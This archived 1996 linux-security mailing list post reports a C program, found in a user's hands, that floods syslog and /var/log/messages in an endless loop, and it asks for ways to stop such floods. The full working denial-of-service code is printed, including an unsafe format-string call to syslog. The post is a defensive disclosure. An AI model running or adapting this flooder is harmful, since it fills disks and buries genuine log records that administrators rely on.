[1085] in linux-security and linux-alert archive
[linux-security] RE: Little exploit in syslogd...
daemon@ATHENA.MIT.EDU (Vladislav S. Davidzon)
Tue Aug 27 08:07:46 1996
Date: Mon, 26 Aug 1996 21:05:37 -0500 (CDT)
From: "Vladislav S. Davidzon" <davidzon@grfn.org>
To: linux-security@tarsier.cv.nrao.edu
cc: cert@cert.org
Here is something I found one of my users using... floods
/var/log/messages....
/* blah.c - does neato thing */
#include <syslog.h>
#define blah "Blah blah blah..."
void Puke()
{
char buffer[4096];
int i, a;
for (i = 0; i<4000; i++)
buffer[i] = 65;
syslog(LOG_CRIT, buffer);
for (a = 0; a<4000; a++)
syslog(LOG_INFO, blah);
}
main()
{
goto puke;
puke: Puke();
goto puke;
}
Pretty anoying little program... any ideas how to make it NOT work????
Make messages NOT floodable?
Sincerely,
V. Davidzon